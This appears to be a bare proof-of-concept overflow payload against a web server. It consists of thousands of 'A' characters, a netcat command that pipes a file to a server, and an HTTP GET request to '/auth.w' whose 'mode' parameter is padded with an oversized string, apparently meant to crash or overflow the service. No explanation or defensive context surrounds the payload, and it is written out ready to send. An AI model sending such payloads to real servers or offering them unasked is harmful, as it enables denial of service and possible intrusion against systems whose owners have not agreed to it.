AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + + nc SERVER PORT -v -v < webmodz3.txt + +GET /auth.w?mode=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA